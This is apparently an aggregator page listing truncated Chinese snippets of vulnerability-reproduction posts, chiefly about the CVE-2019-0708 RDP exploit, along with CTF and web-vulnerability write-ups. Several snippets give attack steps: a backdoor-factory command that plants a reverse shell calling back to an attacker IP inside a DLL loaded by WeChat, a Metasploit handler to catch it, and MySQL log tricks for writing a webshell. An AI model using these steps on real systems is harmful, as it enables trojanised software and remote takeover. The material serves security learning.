CVE-2019-0708:RDP终极EXP复现】的更多相关文章

0x00 前言 每次复现都会遇到各种各样的问题,这次也不例外,经过多次尝试才复现成功,因此把可能的解决方法也和大家分享一下,有想要一起复现学习/投稿的可以联系我哈 0x01 影响版本 Windows 7 Windows Server 2008 R2 Windows Server 2008 Windows 2003 Windows XP Windows 8和Windows 10及之后版本的用户不受此漏洞影响 0x02 环境搭建 环境下载链接: win7 sp1:ed2k://|file|cn_wi…
1. 最近两天发现 更新了微软的CVE 2019-0708的补丁之后 之前设置的手动ip地址会变成 自动获取, 造成ip地址丢失.. 我昨天遇到两个, 今天同事又遇到一个.微软做补丁也不走心啊..…
./backdoor.py -f libEGL.dll -s reverse_shell_tcp_inline -P 6666 -H 192.168.106.137 msfconsle 打开msf 在msf 中 use exploit/multi/handler set payload windows/shell_reverse_tcp show options 查看配置 set lhost 和lport exploit windows7 替换dll文件,打开微信 kali 接收到反弹的shel…
CVE-2019-0708 RDP MSF漏洞复现 漏洞环境 使用 VMware 安装Windows7 X64 模拟受害机 Windows7 X64下载链接:链接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取码: fiwx  EXP kali msf 攻击准备: 1,metasploit-framework, kali msf  需更新到最新版本,如果正常打开输入:msfupdate 进行更新,如果启动msf报错,可以卸载重新安装: cu…
影响版本:小于FlexPaper 2.3.6的所有版本 FlexPaper (https://www.flowpaper.com) 是一个开源项目,遵循GPL协议,在互联网上非常流行.它为web客户端.移动设备和平板设备提供文档的查看功能.至少在2014年之前,维基解密一直在广泛的使用该组件,漏洞产生的原因是受到一个XSS漏洞补丁的影响. Red Timmy Sec在FlexPaper上发现了一个远程命令执行漏洞.供应商立即联系并注册了CVE 2018-11686.尽管这个项目的2.3.7版本已…
Kolibri v2.0-Buffer Overflow成功复现及分析 文件下载地址:http://pan.baidu.com/s/1eS9r9lS 正文 本次讲解用JMP ESP的方法溢出 关于网上的寻蛋指令将会在末尾给出地址 环境:windows xp sp3 工具:Immunity Debugger 配置Kolibri并开启服务 选中根目录  写入index文件 然后访问目标机器的8080端口 配置完毕 初步寻找溢出点 已经配置完了,接下来就开始溢出 用到下面的一个python脚本 imp…
目录 刷题记录:[CISCN 2019 初赛]Love Math 思路一 思路二 总结 刷题记录:[CISCN 2019 初赛]Love Math 题目复现链接:https://buuoj.cn/challenges 参考链接:2019CISCN web题赛-JustSoSo;love_math(复现) 2019全国大学生信息安全竞赛ciscn-writeup(4web) CISCN2019Web WP 源码如下: <?php error_reporting(0); //听说你很喜欢数学,不知道…
目录 刷题记录:[DDCTF 2019]homebrew event loop 知识点 1.逻辑漏洞 2.flask session解密 总结 刷题记录:[DDCTF 2019]homebrew event loop 题目复现链接:https://buuoj.cn/challenges 参考链接:DDCTF2019-WRITEUP 知识点 1.逻辑漏洞 def trigger_event(event): session['log'].append(event) if len(session['l…
目录 刷题记录:[SUCTF 2019]Pythonginx 一.涉及知识点 1. CVE-2019-9636:urlsplit不处理NFKC标准化 2.Nginx重要文件位置 二.解题方法 刷题记录:[SUCTF 2019]Pythonginx 题目复现链接:https://buuoj.cn/challenges 参考链接:2019 SUCTF wp SUCTF_2019_部分复现 一.涉及知识点 1. CVE-2019-9636:urlsplit不处理NFKC标准化 https://bugs…
目录 刷题记录:[GWCTF 2019]枯燥的抽奖 知识点 php伪随机性 刷题记录:[GWCTF 2019]枯燥的抽奖 题目复现链接:https://buuoj.cn/challenges 参考链接:2018SWPUCTF-Web全详解 知识点 php伪随机性 如果mt_srand使用同一个seed,生成的随机数是可以爆破出seed的 https://www.openwall.com/php_mt_seed/ 这道题的应用场景中,字符串生成方式是 mt_srand($_SESSION['see…
Python-爬取CVE漏洞库 最近吧准备复现一下近几年的漏洞,一个一个的去找太麻烦了.今天做到第几页后面过几天再来可能就不记得了.所以我想这搞个爬虫给他爬下来做个excel表格,那就清楚多了.奈何还没写过爬虫,之前就一直对爬虫挺感兴趣的,但是一直没去研究过.今天正好碰到了,躲是躲不掉了,我也尝试找找网上有没有现成的,毕竟我们强大的互联网,找是找到了,还找到好几个,奈何都用不了,并且还看不太懂大佬写的代码.今天搞了一下午搞出了个蹩脚的代码,以后慢慢的再去改进改进吧,毕竟我觉着速度不太快.爬了36…
Ladon LadonGUI Cobalt Strike PowerLadon PythonLadon LinuxLadon 使用说明 ID 主题 URL 1 Ladon文档主页 https://github.com/k8gege/Ladon/wiki 2 基础用法详解 https://github.com/k8gege/Ladon/wiki/Ladon-Usage 3 Cobalt Strike https://github.com/k8gege/Aggressor 4 Exp生成器使用 ht…
转载 https://whoamianony.top/2021/03/13/Web安全/Bypass Disable_functions/ https://www.mi1k7ea.com/2019/06/02/浅谈几种Bypass-disable-functions的方法/#0x07-利用imap-open-绕过 https://www.anquanke.com/post/id/208451#h2-10 https://github.com/AntSwordProject/AntSword-La…
Debian Security Advisory(Debian安全报告) DSA-4414-1 libapache2-mod-auth-mellon security update Package:libapache2-mod-auth-mellon CVE ID::CVE-2019-3877 CVE-2019-3878 Debian Bug: 925197 在提供SAML 2.0身份验证的Apache模块auth_mellon中发现了几个问题. cve - 2019 - 3877 可以在注销时…
漏洞概述 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架.在Struts 2.3.x 系列的 Showcase 应用中演示Struts2整合Struts 1 的插件中存在一处任意代码执行漏洞.当你的应用使用了Struts2 Struts1的插件时,可能导致不受信任的输入传入到ActionMessage类中导致命令执行. 解决方案 向ActionMessage传递原始消息时使用类似下面的资源键值,不要…
2019/9/12 1.漏洞复现 ①发现崩溃 ②找到漏洞所在的函数,下断点,重新跑起来,单步调试,找到栈被改写的地方 ③分析该函数 把MSCOMCTL拖入IDA,查看该函数代码 ④查看调用栈,回溯. 先找到会被覆盖的返回地址的地址,再查看它是如何被覆盖的 找到触发漏洞的函数,查看它的参数,触发漏洞的指针是它的第一个参数 进入函数,找到触发漏洞的语句 可以看出,向一个四字节的局部变量中复制大量数据,导致栈溢出,覆盖了局部变量所属函数的返回地址,从而引发了漏洞. 2.漏洞利用 ①原理分析 经分析,漏…
部分来源于:先知社区 MYSQL-getshell篇 通过日志getshell 查看日志的物理路径(绝对路径) show variables like '%general%'; 打开日志记录内容 set global general_log = on; 重新设置日志路径(绝对路径) set global general_log_file = '日志绝对路径'; 写入webshell 通过SQL的查询语句,查询的语句会被记录在日志中,以此达到将php的webshell写入到日志文件中 select…
Microsoft Exchange远程代码执行漏洞(CVE-2020-16875) 漏洞信息: 由于对cmdlet参数的验证不正确,Microsoft Exchange服务器中存在一个远程执行代码漏洞,该漏洞使攻击者可以通过向受影响的Exchange Server发送特制电子邮件来在SYSTEM执行代码. 影响范围: Microsoft Exchange Server 2016 Cumulative Update 16 Microsoft Exchange Server 2016 Cumula…
0x01 2019年9月7日凌晨,msf上更新了0708的漏洞利用程序. 顿时安全群和朋友圈就爆炸了 - 奈何接到HW攻击队任务,又在家过了个中秋,0708才在今天更新. 0x02 环境 Windows 7 sp1 Kali exp 0x02 利用 1.一键安装metasploit-framework curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploi…
一.漏洞简介 NetLogon 远程协议是一种在 Windows 域控上使用的 RPC 接口,被用于各种与用户和机器认证相关的任务.最常用于让用户使用 NTLM 协议登录服务器,也用于 NTP 响应认…
windows RDP远程代码执行_CVE-2019-0708漏洞复现 一.漏洞概述 2019年5月14日微软官方发布安全补丁,修复了windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统.此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用.利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机. 二.漏洞影响版本 Windows 7 Windows server 2008 R2 Windows server 20…
CVE-2019-0708 Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708.攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息.执行远程代码.发起拒绝服务攻击等等攻击行为.而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类蠕虫病毒,从而进行大规模传播和破坏. 影响范围 Windows 7 Windows Server 2008 R2 Windows Server 2008 Windo…
0x00 漏洞描述 Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广如:windows2003.windows2008.windows2008 R2.windows xp系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的.这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多.CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命…
PART 1 参考链接:https://blog.csdn.net/qq_42184699/article/details/90754333 漏洞介绍: 当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称为“终端服务”)中存在远程执行代码漏洞.此漏洞是预身份验证,无需用户交互.成功利用此漏洞的攻击者可以在目标系统上执行任意代码.攻击者可随后安装程序:查看.更改或删除数据:或者创建拥有完全用户权限的新帐户. payload:https://github…
原文地址:https://bbs.ichunqiu.com/thread-23115-1-1.html 本来今晚在准备复现最近的CVE-2017-11882,由于本人是小白一枚,不知道这么添加msf的exp,一番搜索之后在I春秋看到大神的文章,觉得有用就尝试着试了一下,因此写这篇文,即为记录也为总结. 一.添加新的exploit 首先是进入到我们msf的exp目录下:/usr/share/metasploit-framework/modules/exploits,由于ms17-010属于利用sm…
2019浙师大校赛(浙大命题)(upc复现赛)总结 早上九点开始.起得迟了,吃了早饭慌慌张张跑过去,刚到比赛就开始了. 开始分别从前往后和从后往前看题,一开始A题,第一发WA,第二次读题发现漏看了还有空格,再交过.D题去重输出不同数字个数,J题忘了.B题和宝儿说完ta就有了思路,不过一开始看差了范围数组开小了,RE了几发. Ps: B题考虑一下就会发现,题目要求的是找三个数a.b.c,使a+ b- c> 0,即a+ b> c(找三边使之可以构成一个三角形).当a+ b= c时,a,b,c为斐波…
Sqlite && EF Code FIRST 终极解决方案 2019.5.17 包括根据模型自动生成数据库,初始化数据,模型改变时的自动数据迁移等 2019.12.25 更新 支持EF6.3的SQL Generation:NuGet:Link.EntityFramework.Sqlite 我是真的服了,用nuget自动安装的config每次都用不了,需要添加factory: <remove invariant="System.Data.SQLite" />…
CVE­-2020-­0796 漏洞复现(本地提权) 0X00漏洞简介 Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品,Microsoft Windows是一套个人设备使用的操作系统,Microsoft Windows Server是一套服务器操作系统,Server Message Block是其中的一个服务器信息传输协议. 微软公布了在Server Message Block 3.0(SMBv3)中发现的“蠕虫型…
原文地址:https://bbs.ichunqiu.com/thread-23115-1-1.html 本来今晚在准备复现最近的CVE-2017-11882,由于本人是小白一枚,不知道这么添加msf的exp,一番搜索之后在I春秋看到大神的文章,觉得有用就尝试着试了一下,因此写这篇文,即为记录也为总结. 一.添加新的exploit 首先是进入到我们msf的exp目录下:/usr/share/metasploit-framework/modules/exploits,由于ms17-010属于利用sm…
简介  原题复现:  考察知识点:无参数命令执行.Fuzz  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 环境复现 代码 <?php highlight_file(__FILE__); $code = $_GET['code']; if (!empty($code)) { if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) { if (preg…